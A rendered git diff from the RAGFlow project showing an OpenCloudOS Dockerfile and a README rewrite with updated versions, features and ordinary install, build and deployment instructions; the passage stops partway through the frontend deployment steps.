||||
|
||||
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
||||
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
||||
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
||||
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
||||
echo "conda activate base" >> ~/.bashrc
|
||||
|
||||
ENV PATH /root/miniconda3/bin:$PATH
|
||||
|
||||
RUN conda create -y --name py11 python=3.11
|
||||
|
||||
ENV CONDA_DEFAULT_ENV py11
|
||||
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
||||
ENV PATH $CONDA_PREFIX/bin:$PATH
|
||||
|
||||
# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
|
||||
RUN dnf install -y nodejs
|
||||
|
||||
RUN dnf install -y nginx
|
||||
|
||||
ADD ./web ./web
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
|
||||
RUN dnf install -y openmpi openmpi-devel python3-openmpi
|
||||
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
|
||||
ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
|
||||
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
|
||||
RUN conda run -n py11 pip install redis
|
||||
|
||||
RUN dnf update -y && \
|
||||
dnf install -y glib2 mesa-libGL && \
|
||||
dnf clean all
|
||||
|
||||
RUN conda run -n py11 pip install ollama
|
||||
RUN conda run -n py11 python -m nltk.downloader punkt
|
||||
RUN conda run -n py11 python -m nltk.downloader wordnet
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
FROM opencloudos/opencloudos:9.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
|
||||
|
||||
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
||||
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
||||
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
||||
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
||||
echo "conda activate base" >> ~/.bashrc
|
||||
|
||||
ENV PATH /root/miniconda3/bin:$PATH
|
||||
|
||||
RUN conda create -y --name py11 python=3.11
|
||||
|
||||
ENV CONDA_DEFAULT_ENV py11
|
||||
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
||||
ENV PATH $CONDA_PREFIX/bin:$PATH
|
||||
|
||||
# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
|
||||
RUN dnf install -y nodejs
|
||||
|
||||
RUN dnf install -y nginx
|
||||
|
||||
ADD ./web ./web
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
ADD ./agent ./agent
|
||||
ADD ./graphrag ./graphrag
|
||||
|
||||
RUN dnf install -y openmpi openmpi-devel python3-openmpi
|
||||
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
|
||||
ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
|
||||
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
|
||||
RUN conda run -n py11 pip install redis
|
||||
|
||||
RUN dnf update -y && \
|
||||
dnf install -y glib2 mesa-libGL && \
|
||||
dnf clean all
|
||||
|
||||
RUN conda run -n py11 pip install ollama
|
||||
RUN conda run -n py11 python -m nltk.downloader punkt
|
||||
RUN conda run -n py11 python -m nltk.downloader wordnet
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
|
||||
635
README.md
635
README.md
@ -1,293 +1,342 @@
|
||||
<div align="center">
|
||||
<a href="https://demo.ragflow.io/">
|
||||
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.6.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.6.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
## 💡 What is RAGFlow?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
|
||||
## 📌 Latest Updates
|
||||
|
||||
- 2024-05-21 Supports streaming output and text chunk retrieval API.
|
||||
- 2024-05-15 Integrates OpenAI GPT-4o.
|
||||
- 2024-05-08 Integrates LLM DeepSeek-V2.
|
||||
- 2024-04-26 Adds file management.
|
||||
- 2024-04-19 Supports conversation API ([detail](./docs/conversation_api.md)).
|
||||
- 2024-04-16 Integrates an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
|
||||
- 2024-04-11 Supports [Xinference](./docs/xinference.md) for local LLM deployment.
|
||||
- 2024-04-10 Adds a new layout recognition model for analyzing legal documents.
|
||||
- 2024-04-08 Supports [Ollama](./docs/ollama.md) for local LLM deployment.
|
||||
- 2024-04-07 Supports Chinese UI.
|
||||
|
||||
## 🌟 Key Features
|
||||
|
||||
### 🍭 **"Quality in, quality out"**
|
||||
|
||||
- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
|
||||
- Finds "needle in a data haystack" of literally unlimited tokens.
|
||||
|
||||
### 🍱 **Template-based chunking**
|
||||
|
||||
- Intelligent and explainable.
|
||||
- Plenty of template options to choose from.
|
||||
|
||||
### 🌱 **Grounded citations with reduced hallucinations**
|
||||
|
||||
- Visualization of text chunking to allow human intervention.
|
||||
- Quick view of the key references and traceable citations to support grounded answers.
|
||||
|
||||
### 🍔 **Compatibility with heterogeneous data sources**
|
||||
|
||||
- Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
|
||||
|
||||
### 🛀 **Automated and effortless RAG workflow**
|
||||
|
||||
- Streamlined RAG orchestration catered to both personal and large businesses.
|
||||
- Configurable LLMs as well as embedding models.
|
||||
- Multiple recall paired with fused re-ranking.
|
||||
- Intuitive APIs for seamless integration with business.
|
||||
|
||||
## 🔎 System Architecture
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||
</div>
|
||||
|
||||
## 🎬 Get Started
|
||||
|
||||
### 📝 Prerequisites
|
||||
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
||||
|
||||
### 🚀 Start up the server
|
||||
|
||||
1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
|
||||
|
||||
> To check the value of `vm.max_map_count`:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
>
|
||||
> ```bash
|
||||
> # In this case, we set it to 262144:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
|
||||
2. Clone the repo:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
```
|
||||
|
||||
3. Build the pre-built Docker images and start up the server:
|
||||
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.6.0`, before running the following commands.
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
|
||||
> The core image is about 9 GB in size and may take a while to load.
|
||||
|
||||
4. Check the server status after having the server up and running:
|
||||
|
||||
```bash
|
||||
$ docker logs -f ragflow-server
|
||||
```
|
||||
|
||||
_The following output confirms a successful launch of the system:_
|
||||
|
||||
```bash
|
||||
____ ______ __
|
||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
||||
/____/
|
||||
|
||||
* Running on all addresses (0.0.0.0)
|
||||
* Running on http://127.0.0.1:9380
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.
|
||||
|
||||
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
||||
> With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
|
||||
|
||||
> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
|
||||
|
||||
_The show is now on!_
|
||||
|
||||
## 🔧 Configurations
|
||||
|
||||
When it comes to system configurations, you will need to manage the following files:
|
||||
|
||||
- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
|
||||
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
|
||||
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
|
||||
|
||||
You must ensure that changes to the [.env](./docker/.env) file are in line with what are in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
||||
|
||||
> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
||||
|
||||
To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
|
||||
|
||||
> Updates to all system configurations require a system reboot to take effect:
|
||||
>
|
||||
> ```bash
|
||||
> $ docker-compose up -d
|
||||
> ```
|
||||
|
||||
## 🛠️ Build from source
|
||||
|
||||
To build the Docker images from source:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:dev .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ Launch Service from Source
|
||||
|
||||
To launch the service from source, please follow these steps:
|
||||
|
||||
1. Clone the repository
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. Create a virtual environment (ensure Anaconda or Miniconda is installed)
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
If CUDA version is greater than 12.0, execute the following additional commands:
|
||||
```bash
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. Copy the entry script and configure environment variables
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
Use the following commands to obtain the Python path and the ragflow project path:
|
||||
```bash
|
||||
$ which python
|
||||
$ pwd
|
||||
```
|
||||
|
||||
Set the output of `which python` as the value for `PY` and the output of `pwd` as the value for `PYTHONPATH`.
|
||||
|
||||
If `LD_LIBRARY_PATH` is already configured, it can be commented out.
|
||||
|
||||
```bash
|
||||
# Adjust configurations according to your actual situation; the two export commands are newly added.
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
# Optional: Add Hugging Face mirror
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. Start the base services
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. Check the configuration files
|
||||
Ensure that the settings in **docker/.env** match those in **conf/service_conf.yaml**. The IP addresses and ports for related services in **service_conf.yaml** should be changed to the local machine IP and ports exposed by the container.
|
||||
|
||||
6. Launch the service
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
7. Start the WebUI service
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# Modify proxy.target to 127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
8. Deploy the WebUI service
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ umi build
|
||||
$ mkdir -p /ragflow/web
|
||||
$ cp -r dist /ragflow/web
|
||||
$ apt install nginx -y
|
||||
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
||||
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
||||
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
||||
$ systemctl start nginx
|
||||
```
|
||||
|
||||
## 📚 Documentation
|
||||
|
||||
- [Quickstart](./docs/quickstart.md)
|
||||
- [FAQ](./docs/faq.md)
|
||||
|
||||
## 📜 Roadmap
|
||||
|
||||
See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
|
||||
|
||||
## 🏄 Community
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
|
||||
## 🙌 Contributing
|
||||
|
||||
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
|
||||
<div align="center">
|
||||
<a href="https://demo.ragflow.io/">
|
||||
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a> |
|
||||
<a href="./README_ko.md">한국어</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
<details open>
|
||||
<summary></b>📕 Table of Contents</b></summary>
|
||||
|
||||
- 💡 [What is RAGFlow?](#-what-is-ragflow)
|
||||
- 🎮 [Demo](#-demo)
|
||||
- 📌 [Latest Updates](#-latest-updates)
|
||||
- 🌟 [Key Features](#-key-features)
|
||||
- 🔎 [System Architecture](#-system-architecture)
|
||||
- 🎬 [Get Started](#-get-started)
|
||||
- 🔧 [Configurations](#-configurations)
|
||||
- 🛠️ [Build from source](#-build-from-source)
|
||||
- 🛠️ [Launch service from source](#-launch-service-from-source)
|
||||
- 📚 [Documentation](#-documentation)
|
||||
- 📜 [Roadmap](#-roadmap)
|
||||
- 🏄 [Community](#-community)
|
||||
- 🙌 [Contributing](#-contributing)
|
||||
|
||||
</details>
|
||||
|
||||
## 💡 What is RAGFlow?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
|
||||
## 🎮 Demo
|
||||
|
||||
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 🔥 Latest Updates
|
||||
|
||||
- 2024-09-13 Adds search mode for knowledge base Q&A.
|
||||
- 2024-09-09 Adds a medical consultant agent template.
|
||||
- 2024-08-22 Support text to SQL statements through RAG.
|
||||
- 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) and mind map.
|
||||
- 2024-07-23 Supports audio file parsing.
|
||||
- 2024-07-08 Supports workflow based on [Graph](./agent/README.md).
|
||||
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method, extracting images from Docx files, extracting tables from Markdown files.
|
||||
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
|
||||
|
||||
|
||||
## 🌟 Key Features
|
||||
|
||||
### 🍭 **"Quality in, quality out"**
|
||||
|
||||
- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
|
||||
- Finds "needle in a data haystack" of literally unlimited tokens.
|
||||
|
||||
### 🍱 **Template-based chunking**
|
||||
|
||||
- Intelligent and explainable.
|
||||
- Plenty of template options to choose from.
|
||||
|
||||
### 🌱 **Grounded citations with reduced hallucinations**
|
||||
|
||||
- Visualization of text chunking to allow human intervention.
|
||||
- Quick view of the key references and traceable citations to support grounded answers.
|
||||
|
||||
### 🍔 **Compatibility with heterogeneous data sources**
|
||||
|
||||
- Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
|
||||
|
||||
### 🛀 **Automated and effortless RAG workflow**
|
||||
|
||||
- Streamlined RAG orchestration catered to both personal and large businesses.
|
||||
- Configurable LLMs as well as embedding models.
|
||||
- Multiple recall paired with fused re-ranking.
|
||||
- Intuitive APIs for seamless integration with business.
|
||||
|
||||
## 🔎 System Architecture
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||
</div>
|
||||
|
||||
## 🎬 Get Started
|
||||
|
||||
### 📝 Prerequisites
|
||||
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
||||
|
||||
### 🚀 Start up the server
|
||||
|
||||
1. Ensure `vm.max_map_count` >= 262144:
|
||||
|
||||
> To check the value of `vm.max_map_count`:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
>
|
||||
> ```bash
|
||||
> # In this case, we set it to 262144:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
|
||||
2. Clone the repo:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
```
|
||||
|
||||
3. Build the pre-built Docker images and start up the server:
|
||||
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.11.0`, before running the following commands.
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
|
||||
> The core image is about 9 GB in size and may take a while to load.
|
||||
|
||||
4. Check the server status after having the server up and running:
|
||||
|
||||
```bash
|
||||
$ docker logs -f ragflow-server
|
||||
```
|
||||
|
||||
_The following output confirms a successful launch of the system:_
|
||||
|
||||
```bash
|
||||
____ ______ __
|
||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
||||
/____/
|
||||
|
||||
* Running on all addresses (0.0.0.0)
|
||||
* Running on http://127.0.0.1:9380
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network abnormal` error because, at that moment, your RAGFlow may not be fully initialized.
|
||||
|
||||
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
||||
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
|
||||
|
||||
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
|
||||
|
||||
_The show is now on!_
|
||||
|
||||
## 🔧 Configurations
|
||||
|
||||
When it comes to system configurations, you will need to manage the following files:
|
||||
|
||||
- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
|
||||
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
|
||||
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
|
||||
|
||||
You must ensure that changes to the [.env](./docker/.env) file are in line with what are in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
||||
|
||||
> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
||||
|
||||
To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
|
||||
|
||||
> Updates to all system configurations require a system reboot to take effect:
|
||||
>
|
||||
> ```bash
|
||||
> $ docker-compose up -d
|
||||
> ```
|
||||
|
||||
## 🛠️ Build from source
|
||||
|
||||
To build the Docker images from source:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:dev .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ Launch service from source
|
||||
|
||||
To launch the service from source:
|
||||
|
||||
1. Clone the repository:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
|
||||
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
|
||||
```bash
|
||||
# If your CUDA version is higher than 12.0, run the following additional commands:
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. Copy the entry script and configure environment variables:
|
||||
|
||||
```bash
|
||||
# Get the Python path:
|
||||
$ which python
|
||||
# Get the ragflow project path:
|
||||
$ pwd
|
||||
```
|
||||
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
|
||||
```bash
|
||||
# Adjust configurations according to your actual situation (the following two export commands are newly added):
|
||||
# - Assign the result of `which python` to `PY`.
|
||||
# - Assign the result of `pwd` to `PYTHONPATH`.
|
||||
# - Comment out `LD_LIBRARY_PATH`, if it is configured.
|
||||
# - Optional: Add Hugging Face mirror.
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
|
||||
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. Check the configuration files, ensuring that:
|
||||
|
||||
- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
|
||||
- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
|
||||
|
||||
6. Launch the RAGFlow backend service:
|
||||
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
7. Launch the frontend service:
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# Update proxy.target to http://127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
8. Deploy the frontend service:
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ umi build
|
||||
$ mkdir -p /ragflow/web
|
||||
$ cp -r dist /ragflow/web
|
||||
$ apt install nginx -y
|
||||
$ cp ../docker/nginx/proxy.conf /etc/nginx
